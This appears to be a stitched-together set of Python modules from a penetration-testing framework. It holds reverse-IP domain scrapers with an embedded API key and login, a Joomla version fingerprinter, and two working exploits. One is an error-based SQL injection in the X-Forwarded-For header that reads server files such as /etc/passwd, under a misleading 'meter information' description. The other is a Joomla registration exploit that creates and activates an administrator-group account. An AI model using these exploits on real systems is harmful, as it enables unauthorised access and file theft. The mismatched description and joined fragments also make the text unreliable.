def Whoiswebhosting(self, searcher): req = HTTP(searcher['URL']) urls = [] data = req.Request(searcher['URL'] % (self.ip, 1)) last = search( r'\?pi=([0-9]+)\&ob=SLD\&oo=DESC">\ \;\ \;Last\ \;>\>\;<\/a>', data) url = findall( r'<td><a href="http:\/\/whois\.webhosting\.info\/.*?\.">(.*?)\.<\/a><\/td>', data) urls += url if last: page = last.group(1) for i in range(2, int(page)): data = req.Request(searcher['URL'] % (self.ip, i)) if search( 'The security key helps us prevent automated searches', data): break url = findall( r'<td><a href="http:\/\/whois\.webhosting\.info\/.*?\.">(.*?)\.<\/a><\/td>', data) urls += url self.frmwk.print_status( self.fmt_string.format(searcher['SITE'], urls.__len__())) self.domains += urls else: self.frmwk.print_status( self.fmt_string.format(searcher['SITE'], urls.__len__())) self.domains += urls
def BingApi(self, searcher): KEY = "49EB4B94127F7C7836C96DEB3F2CD8A6D12BDB71" req = HTTP(searcher['URL']) data = req.Request(searcher['URL'] % (KEY, self.ip, 0)) total = search('<web:Total>([0-9]+)<\/web:Total>', data).group(1) page = int(int(total) / 50 + 1) for i in range(1, page): data += req.Request(searcher['URL'] % (KEY, self.ip, i)) result = findall(r'<web:Url>(.+?)<\/web:Url>', data) urls = [] for url in result: urls.append(url.split('/', 3)[2]) self.frmwk.print_status( self.fmt_string.format(searcher['SITE'], urls.__len__())) self.domains += urls
class Module(Templates): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.version = 1 self.author = [ 'Kid' ] self.description = 'Get Basic Meter Information By Reading Tables' self.detailed_description = 'This module retreives some basic meter information and displays it in a human-readable way.' self.options.addString('FILE', 'domain/ip', default = '/etc/passwd') def run(self, frmwk, args): url = 'http://www.google.com/' self.victim = HTTP(url) len = 1 # join = '' while True: header = {'x-forwarded-for': "1' order by (SELECT 1 from (select count(*),concat(floor(rand(0)*2),(substring((select(LOAD_FILE('%s'))),%s,62)))a from information_schema.tables group by a)b);-- -'" % (self.options['FILE'], len)} data = self.victim.Request(url, 'POST', "uname=administrator&upass=12345612345&Submit=+++Login+++",header = header) # print(data) res = search("Duplicate entry '.(.*?)' for key ", data, DOTALL) if res: # join += res.group(1) stdout.write(res.group(1)) stdout.flush() else: break len += 62 # print('--------------data---------- : \n' + join)
def run(self, frmwk, args): url = self.options['URL'] email = CONFIG.GMAIL_ACCOUNT[0] self.username = '******' + str(randint(1000,100000)) self.password = '******' victim = HTTP(url) victim.storecookie = True exploit = 'jform%5Bname%5D=exploit&jform%5Busername%5D=exploit&jform%5Bpassword1%5D=123123&jform%5Bpassword2%5D=1231233&jform%5Bemail1%5D=pentest%40yahoo.com&jform%5Bemail2%5D=pentest%40yahoo.com&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&' registry = 'jform%5Bname%5D={0}&jform%5Busername%5D={0}&jform%5Bpassword1%5D={1}&jform%5Bpassword2%5D={1}&jform%5Bemail1%5D={2}&jform%5Bemail2%5D={2}&option=com_users&task=registration.register&jform%5Bgroups%5D%5B%5D=7&'.format(self.username, self.password, email) frmwk.print_status('Init token') data = victim.Request(url) token = search('name="([a-zA-Z0-9]{32})"\svalue="1"', data) if token: token = token.group(1) else: token = '' frmwk.print_status('Send false request') url = url + '?task=registration.register' victim.Request(url, 'POST', exploit + token + '=1') frmwk.print_status('Send exploit request') data = victim.Request(url, 'POST', registry + token + '=1') warning = search('class="warning\smessage">(.*?)</dd>', data, DOTALL) message = search('class="message\smessage">(.*?)</dd>', data, DOTALL) if warning: frmwk.print_error('Error during exploit : ' + warning.group(1)) return elif message: frmwk.print_success('Successful : ' + message.group(1).strip()) frmwk.print_success('Account login: %s | %s' % (self.username, self.password)) else: frmwk.print_status('HĂȘn xui !') frmwk.print_status('Sleep 30s for mail receiver !') sleep(30) for email in self.getMail(): active = search('(http(.*?)activate&token=(.*?))\s', email['body'], DOTALL) if active: active_link = active.group(1) frmwk.print_status('Active link: ' + active_link) break if active_link: data = victim.Request(active_link) message = search('class="message\smessage">(.*?)</dd>', data, DOTALL) if message: frmwk.print_success('Actived Account: %s | %s' % (self.username, self.password))
def eWhois(self, searcher): params = urlencode({ '_method': 'POST', 'data[User][email]': '*****@*****.**', 'data[User][password]': 'RitX:::R1tX', 'data[User][remember_me]': '0' }) req = HTTP("http://www.ewhois.com/") req.storecookie = True req.rand_useragent = False data = req.Request('http://www.ewhois.com/login/', 'POST', params) data = req.Request("http://www.ewhois.com/export/ip-address/%s/" % self.ip) urls = findall(r'"(.*?)","","","[UA\-[0-9]+\-[0-9]+|]",""', data) self.frmwk.print_status( self.fmt_string.format(searcher['SITE'], urls.__len__())) self.domains += urls
def reverseip(self, searcher): try: if 'SP' not in searcher: req = HTTP(searcher['URL']) if 'DATA' in searcher: data = req.Request(searcher['URL'], 'POST', searcher['DATA'] % self.ip) else: data = req.Request(searcher['URL'] % self.ip) urls = findall(searcher['REGEX'], data) self.frmwk.print_status( self.fmt_string.format(searcher['SITE'], urls.__len__())) self.domains += urls else: searcher['SP'](searcher) except Exception as e: pass
class Searcher(Thread): """docstring for Searcher""" def __init__(self, host, keyworld, limit, delay): super().__init__() self.keyworld = quote_plus(keyworld) self.limit = limit self.delay = delay self.request = HTTP(host, CONFIG.TIME_OUT, user_agents_type='bot') self.count = 0 self.info = [] self.step = 10 def run(self): while True: printer.print_line('\t{0:<25} {1:d}'.format(self.name, self.count)) uri = self.uriCreater() if not self.Has_Next(self.do_search(uri)): break if self.count <= 1: break self.count += self.step if self.count >= self.limit: break sleep(self.delay) def do_search(self, uri): data = self.request.Request(uri) #print("-----------data : %s" % data) if data != '': try: info = self.Getdata(data) except Exception as e: printer.print_error('%s : Nothing to do !' % self.name) pass return '' self.do_split(info) return data def do_split(self, info): ifl = [] for i in info: try: ifl.append(self.Spliter(i.strip())) except Exception as e: printer.print_error('%s Error : %s\ncontent: %s' % (self.name, e, i)) pass self.info += ifl self.step = len(ifl)
def run(self, frmwk, args): self.version = None url = self.options['URL'] if not url.endswith('/'): url += '/' ###### dict from http://www.pepelux.org/programs/joomlascan/ ####### storeversion = [ [ 'language/en-GB/en-GB.ini', [[ 'version 1.5.x 2005-10-30 14:10:00', '1.5.0.Beta-1.5.0.Beta' ], ['9913 2008-01-09 21:28:35Z', '1.5.0.Stable-1.5.0.Stable'], ['9990 2008-02-05 21:54:06Z', '1.5.1.Stable-1.5.1.Stable'], ['10053 2008-02-21 18:57:54Z', '1.5.2.Stable-1.5.2.Stable'], ['10208 2008-04-17 16:43:15Z', '1.5.3.Stable'], ['10498 2008-07-04 00:05:36Z', '1.5.4.Stable-1.5.7.Stable'], ['11214 2008-10-26 01:29:04Z', '1.5.8.Stable-1.5.8.Stable'], ['11391 2009-01-04 13:35:50Z', '1.5.9.Stable-1.5.11.Stable'], [ 'Copyright (C) 2005 - 2010 Open Source Matters', '1.5.16.Stable-1.5.20.Stable' ], ['Problem with Joomla site', '1.5.17.Stable-1.5.17.Stable'], ['17165 2010-05-17 15:59:19Z', '1.6.0.Beta1-1.6.0.Beta1'], ['17420 2010-05-31 11:14:10Z', '1.6.0.Beta2-1.6.0.Beta2'], ['17675 2010-06-14 10:20:52Z', '1.6.0.Beta3-1.6.0.Beta3'], ['17903 2010-06-28 01:52:11Z', '1.6.0.Beta4-1.6.0.Beta4'], ['18082 2010-07-12 01:02:52Z', '1.6.0.Beta5-1.6.0.Beta5'], ['18198 2010-07-21 00:58:13Z', '1.6.0.Beta6-1.6.0.Beta8'], ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.1.Stable'], ['20990 2011-03-18 16:42:30Z', '1.6.2.Stable-1.7.5.Stable']] ], [ 'components/com_contact/metadata.xml', [['8178 2007-07-23 05:39:47Z', '1.5.0.RC2-1.5.18.Stable'], ['17437 2010-06-01 14:35:04Z', '1.5.19.Stable-1.5.20.Stable'], ['16235 2010-04-20 04:13:25Z', '1.6.0.Stable-1.7.5.Stable']] ], [ 'htaccess.txt', [['47 2005-09-15 02:55:27Z', '1.0.0-1.0.2'], ['423 2005-10-09 18:23:50Z', '1.0.3-1.0.3'], ['1005 2005-11-13 17:33:59Z', '1.0.4-1.0.5'], ['1570 2005-12-29 05:53:33Z', '1.0.6-1.0.7'], ['2368 2006-02-14 17:40:02Z', '1.0.8-1.0.9'], ['4085 2006-06-21 16:03:54Z', '1.0.10-1.0.10'], ['4756 2006-08-25 16:07:11Z', '1.0.11-1.0.11'], ['5973 2006-12-11 01:26:33Z', '1.0.12-1.0.12'], ['5975 2006-12-11 01:26:33Z', '1.0.13-1.0.14.RC1'], ['9317 2007-11-07 03:02:08Z', '1.5.0.RC4-1.5.0.Stable'], ['10492 2008-07-02 06:38:28Z', '1.5.0.Beta-1.5.14.Stable'], ['13415 2009-11-03 15:53:25Z', '1.5.15.Stable-1.5.15.Stable'], ['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable'], ['14276 2010-01-18 14:20:28Z', '1.6.0.Beta1-1.6.0.Beta8'], ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.1.Stable'], ['21101 2011-04-07 15:47:33Z', '1.6.2.Stable-1.7.5.Stable']] ], [ 'administrator/language/en-GB/en-GB.ini', [[ 'version 1.5.x 2005-10-30 14:10:00', '1.5.0.Beta-1.5.0.Beta' ], ['9869 2008-01-05 04:00:13Z', '1.5.0.Stable-1.5.0.Stable'], ['9990 2008-02-05 21:54:06Z', '1.5.1.Stable-1.5.1.Stable'], ['10122 2008-03-10 11:58:27Z', '1.5.2.Stable-1.5.2.Stable'], ['10186 2008-04-02 13:10:12Z', '1.5.3.Stable-1.5.3.Stable'], ['10500 2008-07-04 06:57:07Z', '1.5.4.Stable-1.5.4.Stable'], ['10571 2008-07-21 01:27:35Z', '1.5.5.Stable-1.5.7.Stable'], ['11213 2008-10-25 12:43:11Z', '1.5.8.Stable-1.5.8.Stable'], ['11391 2009-01-04 13:35:50Z', '1.5.9.Stable-1.5.9.Stable'], ['11667 2009-03-08 20:32:38Z', '1.5.10.Stable-1.5.10.Stable'], ['11799 2009-05-06 02:15:50Z', '1.5.11.Stable-1.5.11.Stable'], ['12308 2009-06-23 04:05:28Z', '1.5.12.Stable-1.5.14.Stable'], ['13243 2009-10-20 04:01:04Z', '1.5.15.Stable-1.5.15.Stable'], ['16380 2010-04-23 09:19:48Z', '1.5.16.Stable-1.5.20.Stable'], ['17165 2010-05-17 15:59:19Z', '1.6.0.Beta1-1.6.0.Beta1'], ['17387 2010-05-30 16:28:20Z', '1.6.0.Beta2-1.6.0.Beta2'], ['17675 2010-06-14 10:20:52Z', '1.6.0.Beta3-1.6.0.Beta3'], ['17898 2010-06-27 13:03:01Z', '1.6.0.Beta4-1.6.0.Beta4'], ['18090 2010-07-12 10:49:58Z', '1.6.0.Beta5-1.6.0.Beta5'], ['18198 2010-07-21 00:58:13Z', '1.6.0.Beta6-1.6.0.Beta6'], ['18378 2010-08-09 17:29:44Z', '1.6.0.Beta7-1.6.0.Beta7'], ['18572 2010-08-22 09:57:58Z', '1.6.0.Beta8-1.6.0.Beta8'], ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.0.Stable'], ['20899 2011-03-07 20:56:09Z', '1.6.1.Stable-1.6.1.Stable'], ['20990 2011-03-18 16:42:30Z', '1.6.2.Stable-1.6.6.Stable'], ['21721 2011-07-01 08:48:47Z', '1.7.0.Stable-1.7.2.Stable'], ['22370 2011-11-09 16:18:06Z', '1.7.3.Stable-1.7.5.Stable']] ], [ 'language/en-GB/en-GB.com_media.ini', [['10496 2008-07-03 07:08:39Z', '1.5.0.Beta-1.5.12.Stable'], ['12540 2009-07-22 17:34:44Z', '1.5.13.Stable-1.5.14.Stable'], ['13311 2009-10-24 04:13:49Z', '1.5.15.Stable-1.5.15.Stable'], ['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable'], ['17044 2010-05-14 09:52:50Z', '1.6.0.Beta1-1.6.0.Beta3'], ['17769 2010-06-20 01:50:48Z', '1.6.0.Beta4-1.6.0.Beta8'], ['20196 2011-01-09 02:40:25Z', '1.6.0.Stable-1.6.6.Stable'], ['21660 2011-06-23 13:25:32Z', '1.7.0.Stable-1.7.0.Stable'], ['21948 2011-08-08 16:02:50Z', '1.7.1.Stable-1.7.5.Stable']] ], [ 'configuration.php-dist', [['47 2005-09-15 02:55:27Z', '1.0.0-1.0.0'], ['217 2005-09-21 15:15:58Z', '1.0.1-1.0.2'], ['506 2005-10-13 05:49:24Z', '1.0.3-1.0.7'], ['2622 2006-02-26 04:16:09Z', '1.0.8-1.0.8'], ['3754 2006-05-31 12:08:37Z', '1.0.9-1.0.10'], ['4802 2006-08-28 16:18:33Z', '1.0.11-1.0.12'], ['7424 2007-05-17 15:56:10Z', '1.0.13-1.0.15'], ['9991 2008-02-05 22:13:22Z', '1.5.0.Stable-1.5.8.Stable'], ['11409 2009-01-10 02:27:08Z', '1.5.9.Stable-1.5.9.Stable'], ['11687 2009-03-11 17:49:23Z', '1.5.10.Stable-1.5.15.Stable'], ['14401 2010-01-26 14:10:00Z', '1.5.16.Stable-1.5.20.Stable']] ] ] requester = HTTP(url) for link in storeversion: frmwk.print_status('Checking: ' + url + link[0]) data = requester.Request(url + link[0]) if requester.response.status == 200: for vstr in link[1]: if data.find(vstr[0]) != -1: self.version = vstr[1] break if self.version: break if not self.version: frmwk.print_status('Checking: ' + url + 'language/en-GB/en-GB.xml') data = requester.Request(url + 'language/en-GB/en-GB.xml') if requester.response.status == 200: version = search('<version>(.*?)</version>', data) if version: self.version = version.group(1) if not self.version: frmwk.print_status('Checking: ' + url + 'components/com_mailto/mailto.xml') data = requester.Request(url + 'components/com_mailto/mailto.xml') if requester.response.status == 200: version = search('<version>(.*?)</version>', data) if version: self.version = version.group(1) if self.version: frmwk.print_success('Fount version: ' + self.version) else: frmwk.print_error('Unknown version !')